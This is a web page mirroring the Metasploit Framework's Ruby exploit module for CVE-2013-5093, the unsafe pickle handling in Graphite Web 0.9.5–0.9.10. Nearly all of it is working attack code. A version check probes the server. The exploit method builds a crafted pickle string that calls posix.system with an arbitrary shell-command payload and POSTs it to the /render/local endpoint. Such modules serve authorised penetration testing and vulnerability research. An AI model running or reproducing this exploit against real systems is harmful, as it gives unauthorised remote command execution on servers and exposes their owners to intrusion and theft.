CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/graphite_pickle_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name' 			=> 'Graphite Web Unsafe Pickle Handling',

14
      'Description' 	=> %q{

15
        This module exploits a remote code execution vulnerability in the pickle

16
        handling of the rendering code in the Graphite Web project between version

17
        0.9.5 and 0.9.10 (both included).

18
      },

19
      'Author' 		=>

20
        [

21
          'Charlie Eriksen', # Initial discovery and exploit

22
          'funkypickle' # Version check to prove vulnerable

23
        ],

24
      'License' 		=> MSF_LICENSE,

25
      'References'    =>

26
        [

27
          [ 'CVE', '2013-5093'],

28
          [ 'URL', 'http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/']

29
        ],

30
      'Platform' 		 => 'unix',

31
      'Arch' 			 => ARCH_CMD,

32
      'Privileged' 	 => false,

33
      'Targets'		 => [ ['Automatic', {} ] ],

34
      'DisclosureDate' => '2013-08-20',

35
      'DefaultTarget'  => 0,

36
      'Payload'		 =>

37
        {

38
          'DisableNops' => true,

39
          'Space'		  => 16384,

40
          'Compat'	  =>

41
            {

42
              'PayloadType' => 'cmd',

43
              'RequiredCmd' => 'python generic telnet netcat perl ruby'

44
            }

45
        }))

46


47
    register_options(

48
      [

49
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable application', '/'])

50
      ])

51


52
  end

53


54
  def check

55
    res1 = send_request_cgi({

56
      # trailing slash required

57
      'uri'      => normalize_uri(target_uri.path, 'version/'),

58
      'method' => 'GET'

59
    })

60


61
    res2 = send_request_cgi({

62
      'uri' 	 => normalize_uri(target_uri.path, 'render', 'local'),

63
      'method' => 'POST'

64
    })

65


66
    if (res1 and %w(0.9.5 0.9.10).include?(res1.body.strip)) and (res2 and res2.code == 500)

67
      return Exploit::CheckCode::Vulnerable

68
    end

69
    return Exploit::CheckCode::Safe

70
  end

71


72
  def exploit

73
    data = "line\ncposix\nsystem\np1\n(S'#{payload.encoded}'\np2\ntp3\nRp4\n."

74


75
    print_status("Sending exploit payload...")

76


77
    response = send_request_cgi({

78
      'uri' 	 => normalize_uri(target_uri.path, 'render', 'local'),

79
      'method' => 'POST',

80
      'data' 	 => data

81
    })

82
  end

83
end

84


85